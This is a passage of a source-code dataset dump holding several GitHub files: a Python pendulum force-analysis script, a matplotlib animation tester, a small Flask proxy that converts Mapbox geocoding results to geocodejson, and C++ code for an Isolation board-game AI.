a vector increasing steadily from 0 to the drift over that time frame\n theta_fix[prev_zero:_] = theta_section[:-1]-drift_vec[:-1] #make the correction so the last 
theta=0\n prev_zero = _ #store the zero point for the next loop\n return theta_fix #returns the drift-fixed theta\n\n#Function for getting the gradient in the sin(theta) vs ang accel equation\ndef get_gradient(data):\n theta = get_theta(data) #get drift corrected theta from the data #find theta=zeros\n timestamps = data[:,0]\n theta_dot = data[:,3]\n start = find_peaks(savgol_filter(data[:,1],window_length=21, polyorder=2),prominence=5)[0][0]\n theta_double_dot = np.gradient(theta_dot,timestamps)\n x = np.sin(theta)[start:]\n y = savgol_filter(theta_double_dot,window_length=25, polyorder=3)[start:]\n p = np.polyfit(x,y,deg=1)[0] #fit a line through all of the data points\n return p\n\n#Function for finding where force is being applied\ndef forcefinder(force):\n smooth_force = savgol_filter(force,window_length=45,polyorder=3)\n low_smooth_force = savgol_filter(force,window_length=35,polyorder=3)\n peaks,_ = find_peaks(abs(low_smooth_force),prominence=1)\n peak_matrix = np.zeros((len(peaks),3))\n peak_matrix[:,1] = peaks\n peaks = np.append(peaks,len(smooth_force))\n prev_peak = 0\n count = 0\n for i in peaks:\n mini_peaks_before,_ = find_peaks(abs(low_smooth_force)[prev_peak:i],prominence=0)\n begin = mini_peaks_before[-1]+prev_peak\n prev_end = mini_peaks_before[0]+prev_peak\n if count != len(peaks)-1:\n peak_matrix[count,0] = begin\n if count != 0:\n peak_matrix[count-1,2] = prev_end\n prev_peak = i\n count+=1\n return peak_matrix\n\n###-------------------------------------------------------------------------###\n###-------------------------------OPTIMISATION------------------------------###\n###-------------------------------------------------------------------------###\n#Optimise correction parameters for freeswing\ndef force_func(corrections):\n theta_correction_factor,gradient_correction_factor,theta_offset = corrections[0],corrections[1],corrections[2]\n theta = get_theta(freeswing)*theta_correction_factor+theta_offset\n theta_double_dot = np.gradient(freeswing[:,3],freeswing[:,0])\n filtered_theta_double_dot = savgol_filter(theta_double_dot,window_length=25, polyorder=3)*theta_correction_factor\n p = get_gradient(freeswing)*gradient_correction_factor\n force = filtered_theta_double_dot[start:]-p*np.sin(theta[start:])\n return sum(abs(force))\nres=least_squares(fun=force_func, x0=[1,1,0])\nprint(\"theta factor: \",res.x[0],\"\\ngradient factor: \",res.x[1],\"\\ntheta offset: \",res.x[2],\"\\ncost: \",res.fun)\ntheta_correction_factor,gradient_correction_factor,theta_offset = res.x[0],res.x[1],res.x[2]\n#get the -mlg/J gradient from fitting the userinput graph\np = get_gradient(userinput)\nfree_p = get_gradient(freeswing)\n#Use re-integrated, drift corrected theta from now on\ntheta = get_theta(userinput)\nfree_theta = get_theta(freeswing)\n#Calculate some force quantity T/J using just the userinput data\nforce = filtered_theta_double_dot[start:]-p*np.sin(theta[start:])\nsmooth_force = savgol_filter(force,window_length=25, polyorder=3)\n#Calculate some force quantity T/J using just the freeswing data\nfree_force = free_filtered_theta_double_dot[free_start:]-free_p*np.sin(free_theta[free_start:])\nfree_smooth_force = savgol_filter(free_force,window_length=25, polyorder=3)\n#Calculate it post corrections from freeswing data\np_corrected = p*gradient_correction_factor\ntheta_corrected = theta*theta_correction_factor+theta_offset\ntheta_dot_corrected = theta_dot*theta_correction_factor\nforce_corrected = 
theta_correction_factor*filtered_theta_double_dot[start:]-p_corrected*np.sin(theta_corrected[start:])\nsmooth_force_corrected = savgol_filter(force_corrected,window_length=25, polyorder=3)\n#get the indices where force is being applied and released\npeak_matrix = forcefinder(force_corrected).astype(int)\ntheta_dot_zeros,_ = find_peaks(abs(theta_dot[start:]),prominence=1)\n#get following data but when force isnt applied\nno_force_times = timestamps[start:]\nno_force_force = force\nno_force_theta = theta[start:]\nno_force_filtered_theta_double_dot = filtered_theta_double_dot[start:]\nfor i in range(len(peak_matrix)):\n force_range = range(peak_matrix[(len(peak_matrix)-1-i),0],peak_matrix[(len(peak_matrix)-1-i),2])\n no_force_times = np.delete(no_force_times,force_range)\n no_force_theta = np.delete(no_force_theta,force_range)\n no_force_force = np.delete(no_force_force,force_range)\n no_force_filtered_theta_double_dot = np.delete(no_force_filtered_theta_double_dot,force_range)\n#Optimise correction parameters again but only using no force data\ndef force_func2(corrections):\n theta_correction_factor,gradient_correction_factor,theta_offset = corrections[0],corrections[1],corrections[2]\n theta = no_force_theta*theta_correction_factor+theta_offset\n filtered_theta_double_dot = no_force_filtered_theta_double_dot*theta_correction_factor\n p = get_gradient(userinput)*gradient_correction_factor\n force = filtered_theta_double_dot-p*np.sin(theta)\n return sum(abs(force))\nres2=least_squares(fun=force_func2, x0=[1,1,0])\nprint(\"theta factor 2: \",res2.x[0],\"\\ngradient factor 2: \",res2.x[1],\"\\ntheta offset 2: \",res2.x[2],\"\\ncost 2: \",res2.fun)\ntheta_correction_factor2,gradient_correction_factor2,theta_offset2 = res2.x[0],res2.x[1],res2.x[2]\ntheta_corrected2 = theta*theta_correction_factor2+theta_offset2\np_corrected2 = p*gradient_correction_factor2\ntheta_dot_corrected2 = theta_dot*theta_correction_factor2\nforce_corrected2 = filtered_theta_double_dot[start:]*theta_correction_factor2-p_corrected2*np.sin(theta_corrected2[start:])\nsmooth_force_corrected2 = savgol_filter(force_corrected2,window_length=25, polyorder=3)\n###-------------------------------------------------------------------------###\n###-------------------------------UNCERTAINTY-------------------------------###\n###-------------------------------------------------------------------------###\ndef remove_mean(data):\n start = find_peaks(savgol_filter(data[:,1],window_length=21, polyorder=2),prominence=5)[0][0]\n theta_double_dot = np.gradient(data[:,3],data[:,0])[start:]\n filtered_theta_double_dot = savgol_filter(theta_double_dot,window_length=25, polyorder=3)\n p = get_gradient(data)\n theta = get_theta(data)[start:]\n vel = data[:,3][start:]\n force = filtered_theta_double_dot-p*np.sin(theta)\n no_bins = 50\n theta_means_variance = np.zeros([no_bins,2])\n vel_means_variance = np.zeros([no_bins,2])\n free_theta = get_theta(freeswing)[free_start:]\n free_vel = freeswing[:,3][free_start:]\n free_p = get_gradient(freeswing)\n free_theta_double_dot = np.gradient(free_vel,freeswing[:,0][free_start:])\n free_filtered_theta_double_dot = savgol_filter(free_theta_double_dot,window_length=25, polyorder=3)\n free_force = free_filtered_theta_double_dot-free_p*np.sin(free_theta)\n fixed_theta_force = filtered_theta_double_dot-p*np.sin(theta)\n fixed_vel_force = filtered_theta_double_dot-p*np.sin(theta)\n for bin in range(no_bins):\n theta_bin_start = (bin-no_bins/2)*2*np.pi/no_bins\n theta_bin_end = (bin-no_bins/2+1)*2*np.pi/no_bins\n 
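# bins are fixed-width in theta, spanning [-pi, pi); assumes swings stay within one revolution\n        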
free_theta_bin_indices = np.where((free_theta>=theta_bin_start)&(free_theta<theta_bin_end))\n data_theta_bin_indices = np.where((theta>=theta_bin_start)&(theta<theta_bin_end))\n if np.size(free_theta_bin_indices)>0:\n theta_means_variance[bin,0] = np.mean(free_force[free_theta_bin_indices])\n theta_means_variance[bin,1] = np.var(free_force[free_theta_bin_indices])\n fixed_theta_force[data_theta_bin_indices] = force[data_theta_bin_indices] - theta_means_variance[bin,0]\n\n vel_bin_start = (bin-no_bins/2)*(max(theta_dot)-min(theta_dot))/no_bins\n vel_bin_end = (bin-no_bins/2+1)*(max(theta_dot)-min(theta_dot))/no_bins\n free_vel_bin_indices = np.where((free_vel>=vel_bin_start)&(free_vel<vel_bin_end))\n data_vel_bin_indices = np.where((vel>=vel_bin_start)&(vel<vel_bin_end))\n if np.size(free_vel_bin_indices)>0:\n vel_means_variance[bin,0] = np.mean(free_force[free_vel_bin_indices])\n vel_means_variance[bin,1] = np.var(free_force[free_vel_bin_indices])\n fixed_vel_force[data_vel_bin_indices] = force[data_vel_bin_indices] - vel_means_variance[bin,0]\n\n return fixed_theta_force,theta_means_variance,vel_means_variance,fixed_vel_force,\n###-------------------------------------------------------------------------###\n###----------------------------------PLOTS----------------------------------###\n###-------------------------------------------------------------------------###\n#Plot mean and variance at each theta bin (theta corrected)\nplt.plot(free_theta[free_start:]*180/np.pi,free_force,'.',linewidth=0.5,label=r'Datapoints')\nplt.plot(np.linspace(-180,180,num=len(remove_mean(userinput)[1])),remove_mean(userinput)[1][:,0],label=r'Mean force')\nplt.xlabel(r'$\\theta$ bin (degrees)')\nplt.ylabel(r'Mean force $\\frac{T}{J}(s^{-2})$')\nplt.title(r'Mean force in each $\\theta$ bin')\nplt.legend()\nplt.show()\nplt.plot(np.linspace(-180,180,num=len(remove_mean(userinput)[1])),remove_mean(userinput)[1][:,1],label=r'Force variance')\nplt.xlabel(r'$\\theta$ bin (degrees)')\nplt.ylabel(r'$\\frac{T}{J}$ force variance')\nplt.title(r'Force variance in each $\\theta$ bin')\nplt.show()\n#Plot mean and variance at each theta bin (vel corrected)\nplt.plot(freeswing[:,3][free_start:],free_force,'.',linewidth=0.5,label=r'Datapoints')\nplt.plot(np.linspace(min(theta_dot),max(theta_dot),num=len(remove_mean(userinput)[2])),remove_mean(userinput)[2][:,0],label=r'Mean force')\nplt.xlabel(r'$\\dot{\\theta}$ bin (rad$s^{-1}$)')\nplt.ylabel(r'Mean force $\\frac{T}{J}(s^{-2})$')\nplt.title(r'Mean force in each $\\dot{\\theta}$ bin')\nplt.legend()\nplt.show()\nplt.plot(np.linspace(min(theta_dot),max(theta_dot),num=len(remove_mean(userinput)[2])),remove_mean(userinput)[2][:,1],label=r'Force variance')\nplt.xlabel(r'$\\dot{\\theta}$ bin (rad$s^{-1}$)')\nplt.ylabel(r'$\\frac{T}{J}$ force variance')\nplt.title(r'Force variance in each $\\dot{\\theta}$ bin')\nplt.show()\n#Plot force vs time for measured force, parameter corrected forces and mean corrected force (theta)\nplt.plot(timestamps[start:],force,label='no correction')\nplt.plot(no_force_times,no_force_force,'.',label='no applied force')\nplt.plot(timestamps[start:],force_corrected2,label='2nd correction')\nplt.plot(timestamps[start:],remove_mean(userinput)[0],label='Mean removed')\nplt.xlabel(r't(s)')\nplt.ylabel(r'$\\\"{\\theta}+\\frac{mgl}{J}sin(\\theta)$(rad/$s^2$)')\nplt.title(r'Force vs time: As measured, parameter and mean corrected')\nplt.axhline(0,color='b',linestyle='--')\nplt.legend()\nplt.show()\n#Plot force vs time for measured force, parameter corrected forces 
and mean corrected force (vel)\nplt.plot(timestamps[start:],force,label='no correction')\nplt.plot(no_force_times,no_force_force,'.',label='no applied force')\nplt.plot(timestamps[start:],force_corrected2,label='2nd correction')\nplt.plot(timestamps[start:],remove_mean(userinput)[3],label='Mean removed')\nplt.xlabel(r't(s)')\nplt.ylabel(r'$\\\"{\\theta}+\\frac{mgl}{J}sin(\\theta)$(rad/$s^2$)')\nplt.title(r'Force vs time: As measured, parameter and mean corrected')\nplt.axhline(0,color='b',linestyle='--')\nplt.legend()\nplt.show()\n"
},
{
"alpha_fraction": 0.616314172744751,
"alphanum_fraction": 0.6495468020439148,
"avg_line_length": 24.461538314819336,
"blob_id": "723824db173be3f88b6bd5407e0a797a47a3769b",
"content_id": "38b8f128e27bf089c4de537722b919a360fa9fac",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 993,
"license_type": "no_license",
"max_line_length": 129,
"num_lines": 39,
"path": "/tester.py",
"repo_name": "ShuowangHe/IIB-Project2",
"src_encoding": "UTF-8",
"text": "import numpy as np\nfrom matplotlib import pyplot as plt\nfrom numpy import genfromtxt\nfrom matplotlib.animation import FuncAnimation\nplt.style.use('seaborn-pastel')\nimport csv\n\n\nfig = plt.figure()\nax1 = fig.add_subplot(1,1,1)\nax = plt.axes(xlim=(0, 20), ylim=(-2, 90))\n#line, = ax.plot([], [], lw=1)\nx_len = 400\nxs = np.zeros([x_len,1])\nys = np.zeros([x_len,1])\n\n#def init():\n #line.set_data(xs, ys)\n #return line,\n #ax1.clear()\n #ax1.plot(xs, ys)\n\nringing_data = genfromtxt('/Users/shuowanghe/github/IIB-Project/processed 22:11:19 Benet/flipped_ringingvid1.csv', delimiter=',')\n\ndef animate(i,ringing_data,xs,ys):\n xs = np.append(xs,ringing_data[i,0])\n xs = xs[-x_len:]\n ys = np.append(ys,ringing_data[i,1])\n ys = ys[-x_len:]\n ax1.clear()\n ax1.plot(xs, ys)\n #line.set_data(xs, ys)\n print(xs[-1],ys[-1])\n #return line,\n\nanim = FuncAnimation(fig, animate, fargs = (ringing_data,xs,ys),interval=10)\n\nplt.show()\n#anim.save('test.gif', writer='PillowWriter')\n"
}
] | 16 |
geocoders/mapbox-geocodejson | https://github.com/geocoders/mapbox-geocodejson | 20d3cafca49820c8b5d97c91a5d41ad77c1d89cf | 9b23646f6393a9b39513a8050242f1883d4eefe6 | abe78f3c386a82555521dd7da66cc2bd82c61297 | refs/heads/master | 2023-03-23T09:47:03.793195 | 2017-11-09T15:38:20 | 2017-11-09T15:41:15 | 110,133,804 | 0 | 0 | null | 2017-11-09T15:40:14 | 2017-11-09T15:48:13 | 2021-03-19T21:38:15 | Python | [
{
"alpha_fraction": 0.6644737124443054,
"alphanum_fraction": 0.6776315569877625,
"avg_line_length": 29.399999618530273,
"blob_id": "1e0a75713bf77d3eff97069251d2d007d591b70a",
"content_id": "444b7d995c98834b0c6f225f49db08b1d44b3e9a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 152,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 5,
"path": "/default_params/__init__.py",
"repo_name": "geocoders/mapbox-geocodejson",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nmapbox_API_key = \"pk.insert_token\"\nmapbox_base_url = \"https://api.mapbox.com/geocoding/v5/mapbox.places\"\n"
},
{
"alpha_fraction": 0.7063599228858948,
"alphanum_fraction": 0.7293639779090881,
"avg_line_length": 25.39285659790039,
"blob_id": "5cf8caf8cf6e3fbf341c5420c9f435fca6e1f956",
"content_id": "ba43c0c17f94d3f6ca3d4940822d9335aec38630",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 739,
"license_type": "no_license",
"max_line_length": 171,
"num_lines": 28,
"path": "/README.md",
"repo_name": "geocoders/mapbox-geocodejson",
"src_encoding": "UTF-8",
"text": "# Mapbox geocoding results in geocodejson format\n\nA very dumb proxy to run queries against mapbox geocoding API, and make Carmen geojson result compatible with [geocodejson](https://github.com/geocoders/geocodejson-spec).\n\n## Intalling\n\nPython3 is needed.\nTo install the requirements :\n\n pipenv install --three\n\nThen duplicate the default_params folder and rename to params :\n\n cp -R default_params/ params/\n\nPut your mapbox api key in the `params/__init__.py`\n\n## Running\n\n python api.py\n\nThen, you can geocode some stuff :\n\n curl 'http://localhost:5000/?q=rue%20de%20la%20procession'\n\nOr use [geocoder-tester](https://github.com/geocoders/geocoder-tester) :\n\n py.test --api-url http://localhost:5000/ --max-run 10\n"
},
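The README entry above shows the proxy being queried with curl. For readers following along, here is an equivalent request made from Python; it assumes only what the README states (the proxy from api.py listening on localhost:5000 and a `q` query parameter), and the timeout value is an illustrative addition, not part of the project.

    import requests

    # Query the locally running proxy exactly as the README's curl example does.
    resp = requests.get("http://localhost:5000/",
                        params={"q": "rue de la procession"},
                        timeout=10)  # timeout is an illustrative choice
    resp.raise_for_status()
    collection = resp.json()
    # The proxy returns a GeoJSON FeatureCollection; each feature carries
    # geocodejson-style 'name' and 'label' entries in its properties.
    for feature in collection.get("features", []):
        print(feature["properties"].get("label"))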
{
"alpha_fraction": 0.583638608455658,
"alphanum_fraction": 0.587708592414856,
"avg_line_length": 38.629032135009766,
"blob_id": "0b1de6eda5e54f0403687e2100d1400c69f5d622",
"content_id": "cb3cf1b96f2b2dcae62461ee2810ad000db842a6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2457,
"license_type": "no_license",
"max_line_length": 123,
"num_lines": 62,
"path": "/api.py",
"repo_name": "geocoders/mapbox-geocodejson",
"src_encoding": "UTF-8",
"text": "# encoding: utf-8\n\nfrom flask import Flask\nfrom flask_restful import Resource, Api, reqparse\nimport requests\nfrom params import mapbox_API_key as TOKEN\nfrom params import mapbox_base_url as BASE\n\napp = Flask(__name__)\napi = Api(app)\n\nmapbox_API_key = TOKEN\nmapbox_base_url = BASE\n\nclass CarmenAutocomplete(Resource):\n def get(self):\n parser = reqparse.RequestParser()\n parser.add_argument('q', type=str, help='the q you are you looking for', required=True)\n parser.add_argument('limit', type=int) #not available in the api ?\n args = parser.parse_args()\n query = args['q']\n\n autocomplete_url = \"{}/{}.json\".format(mapbox_base_url, query)\n get_results = requests.get(autocomplete_url, params = {'access_token' : mapbox_API_key})\n\n if not \"features\" in get_results.json() :\n return {\"type\": \"FeatureCollection\", \"features\":[], \"error\":\"no results\"}\n\n carmen_results = get_results.json()['features']\n geocodejson_results = []\n\n for a_feature in carmen_results :\n a_feature['properties']['type'] = a_feature['place_type'][0]\n a_feature['properties']['id'] = a_feature['id']\n a_feature['properties']['score'] = a_feature['relevance']\n a_feature['properties'][\"name\"] = a_feature['text']\n a_feature['properties'][\"label\"] = a_feature['place_name']\n if \"context\" in a_feature and len(a_feature[\"context\"]) > 2:\n a_feature['properties'][\"city\"] = a_feature['context'][1]['text']\n a_feature['properties'][\"postcode\"] = a_feature['context'][0]['text']\n a_feature['properties'][\"country\"] = a_feature['context'][2]['text']\n\n if \"address\" in a_feature:\n a_feature['properties'][\"housenumber\"] = a_feature['address']\n a_feature['properties'][\"street\"] = a_feature['text']\n a_feature['properties']['type'] = \"housenumber\"\n a_feature['properties'][\"name\"] = \"{} {}\".format(a_feature['properties'][\"housenumber\"], a_feature[\"text\"])\n\n geocodejson_results.append(a_feature)\n\n geocoder_json = {\n \"type\" : \"FeatureCollection\",\n \"query\" : get_results.json()['query'],\n \"features\" : geocodejson_results,\n }\n\n return geocoder_json\n\napi.add_resource(CarmenAutocomplete, '/')\n\nif __name__ == '__main__':\n app.run(debug=True, host='0.0.0.0')\n"
}
] | 3 |
koushikg14/ai | https://github.com/koushikg14/ai | 9f22bbcb1f7fe08081e83447b6afe3b0cbe02af3 | 111f2c525cab6991875dda90563cbea23e9b0600 | c666f1dd52c124112d93e51d17d669d2927737e0 | refs/heads/master | 2021-01-11T19:05:13.373747 | 2013-05-07T02:52:38 | 2013-05-07T02:52:38 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5964391827583313,
"alphanum_fraction": 0.6133955121040344,
"avg_line_length": 20.445453643798828,
"blob_id": "06886f50fc0ac91ebe50db13500cb4ed45ed2cc8",
"content_id": "e48f0c51dd49664d2f36606e797c876a05eca1ad",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2359,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 110,
"path": "/isolation/src/table.h",
"repo_name": "koushikg14/ai",
"src_encoding": "UTF-8",
"text": "#ifndef TABLE_H_\n#define TABLE_H_\n\n#include <set>\n#include <map>\n#include \"types.h\"\n#include \"game.h\"\n\nusing namespace std;\n\nstruct Entry\n{\n\tBoard board;\n\tPosition my;\n\tPosition her;\n\tint depth;\n int isolated; // 0 if unknown, 1 if isolated, -1 if not\n\tdouble score;\n\nEntry(Board b, Position m, Position h) : \n\tboard(b), my(m), her(h), isolated(0) {}\t\n\nEntry(Board b, Position m, Position h, int i) : \n\tboard(b), my(m), her(h), isolated(i) {}\t\n\nEntry(Board b, Position m, Position h, double s) : \n\tboard(b), my(m), her(h), isolated(0), score(s) {}\t\n};\n\nstruct EntryCompare {\n\tbool operator() (const Entry& lhs, const Entry& rhs) const {\n\t\tif (lhs.board != rhs.board)\n\t\t\treturn lhs.board < rhs.board;\n\t\telse if (lhs.my.row != rhs.my.row || lhs.my.col != rhs.my.col)\n\t\t\treturn lhs.my < rhs.my;\n\t\telse\n\t\t\treturn lhs.her < rhs.her;\n\t}\n};\n\n/*\n * Tranposition table\n */\nclass Table\n{\n private:\n\tset<Entry, EntryCompare> table_;\n\tint hits_;\n\t\n public:\n Table() : hits_(0) {}\n\t\t\n\t// check if current entry has exists\n\t// return 0, if unknown\n\t// return 1, if isolated\n\t// return -1 if not isolated\n\tint isolated(Board board, Position my, Position her) {\n\t\tset<Entry>::iterator it = table_.find(Entry(board,my,her,true));\n\t\t\n\t\t// if entry does not exists\n\t\t// or if isolation test is not done\n\t\tif (it == table_.end() || it->isolated == 0)\n\t\t\treturn 0;\n\n\t\thits_++;\n\t\tif (hits_ % 10000 == 0)\n\t\t\tcout << \"hits:\" << hits_ << endl;\n\n\t\tEntry e = *it;\n\t\tif (e.isolated)\n\t\t\treturn 1;\n\t\telse\n\t\t\treturn -1;\n\t}\n\n\tvoid insert(Board board, Position my, Position her, bool isolated) {\n\t\tint i = isolated ? 1 : -1;\n\t\ttable_.insert(Entry(board, my, her, i));\n\t\tif (table_.size() % 10000 == 0)\n\t\t\tcout << \"Table size:\" << table_.size() << endl;\n\n\t}\n\n\tdouble LookupScore(Board board, Position my, Position her) {\n\t\tset<Entry>::iterator it = table_.find(Entry(board,my,her));\n\t\t\n\t\t// if entry does not exists\n\t\t// or if the isolation test is done\n\t\tif (it == table_.end() || it->isolated)\n\t\t\treturn 0;\n\n\t\thits_++;\n\t\tif (hits_ % 10000 == 0)\n\t\t\tcout << \"hits:\" << hits_ << endl;\n\n\t\treturn it->score;\n\t}\n\n\n\tvoid InsertScore(Board board, Position my, Position her, double score) {\n\t\ttable_.insert(Entry(board, my, her, score));\n\t\tif (table_.size() % 10000 == 0)\n\t\t\tcout << \"Table size:\" << table_.size() << endl;\n\t}\n\n\n\tunsigned int size() { return table_.size();}\n};\n\n#endif // TABLE_H_\n"
},
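table.h above implements a transposition table whose isolated() lookup is tri-state: 0 for unknown, 1 for isolated, -1 for not isolated. A minimal dict-based Python sketch of that lookup protocol follows, for illustration only; the class and method names here are hypothetical, not taken from the C++ code.

    # Tri-state transposition-table lookup, mirroring table.h:
    # 0 = unknown, 1 = isolated, -1 = not isolated.
    class TranspositionTable:  # hypothetical name
        def __init__(self):
            self._entries = {}  # (board, my, her) -> bool

        def lookup(self, board, my, her):
            cached = self._entries.get((board, my, her))
            if cached is None:
                return 0        # unknown: caller must run the real BFS test
            return 1 if cached else -1

        def store(self, board, my, her, isolated):
            self._entries[(board, my, her)] = isolated

    # Usage pattern as in IsIsolated: consult first, search on a miss, memoize.
    table = TranspositionTable()
    state = (0b1001, (0, 0), (7, 7))  # toy encoded position
    if table.lookup(*state) == 0:
        table.store(*state, isolated=True)
    assert table.lookup(*state) == 1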
{
"alpha_fraction": 0.6548942923545837,
"alphanum_fraction": 0.6616525053977966,
"avg_line_length": 22.580976486206055,
"blob_id": "38fb3f15ed5ad2a13d9fa61e179e947fe8f31690",
"content_id": "7f77aba8e1e9db1c391bd511ac30de1d3ec0e211",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 9174,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 389,
"path": "/isolation/src/nplayer.cc",
"repo_name": "koushikg14/ai",
"src_encoding": "UTF-8",
"text": "#include <iostream>\n#include <limits>\n#include <queue>\n#include <set>\n#include <stdio.h>\n#include <stdlib.h>\n\n#include \"types.h\"\n#include \"game.h\"\n#include \"table.h\"\n#include \"util.h\"\n#include \"nplayer.h\"\n\nusing namespace std;\n\nbool AggressivePlayer::IsIsolated(Board board, Position my, Position her)\n{\n\t// check the table first\n\t// int lookup = table_.isolated(board, my, her);\n\n\t// if (lookup == 1)\n\t// \treturn true;\n\t// else if (lookup == -1)\n\t// \treturn false;\n\t\n\t// BFS\n\tqueue<BfsNode> frontier;\n\tfrontier.push(BfsNode(board, my, 0));\n\n\tstd::set<BfsNode, BfsNodeCompare> visited;\n\tvisited.insert(BfsNode(board, my));\n\n\tint maxsteps = 0; // keep max steps I left\n\twhile (!frontier.empty()) {\n\t\tBfsNode node = frontier.front();\n\t\tif (node.depth > maxsteps)\n\t\t\tmaxsteps = node.depth;\n\t\tfrontier.pop();\n\n\t\t// cutoff\n\t\tif (frontier.size() > kMaxIsolationNodes)\n\t\t\treturn false;\n\n\t\tfor (int d = 0; d < 8; d++) {\n\t\t\tPosition next = MakeMove(node.cur, Action((Direction)d, 1));\n\t\t\t// we are reachable\n\t\t\tif (next == her) {\n\t\t\t\t//\t\t\t\ttable_.insert(board,my,her,false);\n\t\t\t\treturn false;\n\t\t\t}\n\n\t\t\tBoard nboard;\n\t\t\tif ((nboard=TryMove(node.board, node.cur, (Direction)d, 1))\n\t\t\t\t&& visited.find(BfsNode(nboard, next))==visited.end()) {\n\t\t\t\tfrontier.push(BfsNode(nboard, next, node.depth+1));\n\t\t\t\tvisited.insert(BfsNode(nboard, next));\n\t\t\t}\n\t\t}\n\t}\n\n\t//\ttable_.insert(board,my,her,true);\n\treturn true;\n}\n\n\n// return the maximum number of steps\n// conditioned on that we are isolated\n// this is deterministic\nint AggressivePlayer::MaxClosureDFS(Board board, Position cur, int depth, int maxdepth)\n{\n\t// make sure when we reach the cut off\n\t// we will have one more step than the cutoff\n\tif (depth > maxdepth)\n\t\treturn 0;\n\n\tint maxsteps = -1; // keep max steps I left\n\tfor (int d = 0; d < 8; d++) {\n\t\tPosition next = MakeMove(cur, Action((Direction)d, 1));\n\t\tBoard nboard;\n\t\tif ((nboard=TryMove(board, cur, (Direction)d, 1))) {\n\t\t\tint steps = MaxClosureDFS(nboard, next, depth+1, maxdepth);\n\t\t\tif (steps > maxsteps)\n\t\t\t\tmaxsteps = steps;\n\t\t}\n\t}\n\n\treturn 1 + maxsteps;\n}\n\n// return the maximum number of steps\n// conditioned on that we are isolated\n// this is deterministic\nint AggressivePlayer::MaxClosure(Board board, Position cur)\n{\n\tqueue<BfsNode> frontier;\n\tfrontier.push(BfsNode(board, cur, 0));\n\n\tstd::set<BfsNode, BfsNodeCompare> visited;\n\tvisited.insert(BfsNode(board, cur));\n\n\tint maxsteps = 0; // keep max steps I left\n\twhile (!frontier.empty()) {\n\t\tBfsNode node = frontier.front();\n\t\tif (node.depth > maxsteps)\n\t\t\tmaxsteps = node.depth;\n\n\t\tfrontier.pop();\n\n\t\t// cutoff\n\t\tif (frontier.size() > kMaxIsolationNodes) {\n\t\t\treturn maxsteps; // do not need to relax\n\t\t}\n\n\t\tfor (int d = 0; d < 8; d++) {\n\t\t\tPosition next = MakeMove(node.cur, Action((Direction)d, 1));\n\n\t\t\tBoard nboard;\n\t\t\tif ((nboard=TryMove(node.board, node.cur, (Direction)d, 1))) {\n\t\t\t\tif (visited.find(BfsNode(nboard, next))==visited.end()) {\n\t\t\t\t\tfrontier.push(BfsNode(nboard, next, node.depth+1));\n\t\t\t\t\tvisited.insert(BfsNode(nboard, next));\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\n\treturn maxsteps;\n}\n\n\n\ndouble AggressivePlayer::Eval(Board board, Position my, Position her, int depth)\n{\n\tvector<Action> myactions = GenerateActions(board, my);\n\tvector<Action> heractions = 
GenerateActions(board, her);\n\n\t// she cannot move\n\t// we win!\n\tif (heractions.size() == 0)\n\t\treturn DMAX;\n\n\treturn 1.0 * myactions.size() / heractions.size();\n}\n\n\n\n// Estimate the likelihood that we are isolated\n// and she controls more squres than me\ndouble AggressivePlayer::Eval2(Board board, Position my, Position her)\n{\n\tif (IsIsolated(board, my, her)) {\n\t\tint hersteps = MaxClosureDFS(board, her, 0, kMaxDFSDepth);\n\t\tint mysteps = MaxClosureDFS(board, my, 0, kMaxDFSDepth);\n\t\tif (mysteps > hersteps)\n\t\t\treturn DMAX;\n\t\telse if (mysteps < hersteps)\n\t\t\treturn DMIN;\n\t}\n\treturn 0;\n}\n\nbool AggressivePlayer::Cutoff(Board board, Position my, Position her, int depth)\n{\n\tif (steps_ > kEndGameSteps)\n\t\treturn depth > kEndGameMaxDepth;\n\telse if (steps_ > kMidGameSteps)\n\t\treturn depth > kMidGameMaxDepth;\n\telse\n\t\treturn depth > kDefaultMaxDepth;\n}\n\n\nint AggressivePlayer::DoLocalMove(Board board, Position cur)\n{\n\tqueue<BfsNode> frontier;\n\tfrontier.push(BfsNode(board, cur, 0));\n\n\tstd::set<BfsNode, BfsNodeCompare> visited;\n\tvisited.insert(BfsNode(board, cur));\n\n\tint maxsteps = 0; // keep max steps I left\n\twhile (!frontier.empty()) {\n\t\tBfsNode node = frontier.front();\n\t\tif (node.depth > maxsteps) {\n\t\t\tmaxsteps = node.depth;\n\t\t\t\n\t\t\t// early termination\n\t\t\tif (maxsteps > hersteps_) \n\t\t\t\treturn maxsteps;\n\t\t}\n\n\t\tfrontier.pop();\n\n\t\tfor (int d = 0; d < 8; d++) {\n\t\t\tPosition next = MakeMove(node.cur, Action((Direction)d, 1));\n\n\t\t\tBoard nboard;\n\t\t\tif ((nboard=TryMove(node.board, node.cur, (Direction)d, 1))) {\n\t\t\t\tif (visited.find(BfsNode(nboard, next))==visited.end()) {\n\t\t\t\t\tfrontier.push(BfsNode(nboard, next, node.depth+1));\n\t\t\t\t\tvisited.insert(BfsNode(nboard, next));\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\treturn maxsteps;\n}\n\n\n// Find the next best local move\nPosition AggressivePlayer::LocalMove(Board board, Position my)\n{\n\tPosition best = Position(-1,-1);\n\tint maxsteps = 0;\n\tfor (int d = 0; d < 8; d++) {\n\t\tPosition next = MakeMove(my, Action((Direction)d, 1));\n\t\tBoard nboard=TryMove(board, my, (Direction)d, 1);\n\t\tif (nboard) {\n\t\t\tint steps = DoLocalMove(nboard, next);\n\t\t\tif (steps >= maxsteps) {\n\t\t\t\tmaxsteps = steps;\n\t\t\t\tbest = next;\n\t\t\t\tif (steps > hersteps_) // we only need to do better than her\n\t\t\t\t\tbreak;\n\t\t\t}\n\t\t}\n\t}\n\thersteps_--;\n\treturn best;\n}\n\n\n\nPosition 